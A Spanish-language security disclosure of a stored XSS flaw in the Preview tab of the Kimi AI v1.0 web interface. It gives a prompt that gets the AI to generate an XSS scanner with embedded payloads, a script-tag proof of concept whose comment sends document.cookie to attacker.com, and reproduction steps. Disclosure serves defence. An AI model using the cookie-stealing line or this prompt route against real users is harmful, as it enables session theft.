
Divulgación detallada de una vulnerabilidad XSS almacenada en la pestaña Vista previa de Kimi AI v1.0, incluyendo el escenario de ataque, el PoC y las pautas de remediación para investigadores de seguridad.
Existe una vulnerabilidad de Cross-Site Scripting (XSS) en la función 'Preview' de la interfaz web de Kimi AI v1.0. La aplicación no sanea ni codifica adecuadamente las cargas útiles HTML/JavaScript generadas por el modelo de IA. Cuando un usuario cambia a la pestaña 'Preview' para ver el código generado por la IA, la carga útil maliciosa se renderiza directamente en el DOM, lo que provoca la ejecución arbitraria de JavaScript en la sesión del navegador de la víctima.
Mustafa Hameed
La vulnerabilidad puede explotarse pidiendo a la IA que genere una herramienta o script de seguridad (por ejemplo, un escáner XSS automatizado similar a XSStrike) que contenga cargas útiles integradas. La IA genera el código fuente de la aplicación solicitada, pero incrusta la carga útil maliciosa dentro del framework HTML/JavaScript. Cuando la víctima navega a la pestaña 'Preview' para probar o ver la herramienta generada, la carga útil maliciosa incrustada evita el saneamiento y se ejecuta inmediatamente.
"Crea una herramienta web simple de escaneo XSS similar a XSStrike. Incluye una interfaz con una lista de cargas útiles para escanear."
<script>
alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
1.Inicie sesión en la plataforma web de Kimi AI.
2.Proporcione el prompt solicitando la creación de una herramienta (como el clon de XSStrike) que contenga el código del escáner.
3.Espere a que el modelo de IA genere completamente la respuesta de código.
4.Haga clic en la pestaña 'Preview' en la interfaz de chat para ver la aplicación renderizada.
5.La aplicación no filtra el contexto JavaScript dentro del contenedor de vista previa, lo que provoca la ejecución inmediata del script en el navegador de la víctima.
A continuación se muestra la captura de pantalla que demuestra la ejecución exitosa de la carga útil XSS. El JavaScript malicioso se activa inmediatamente al navegar a la pestaña 'Preview':
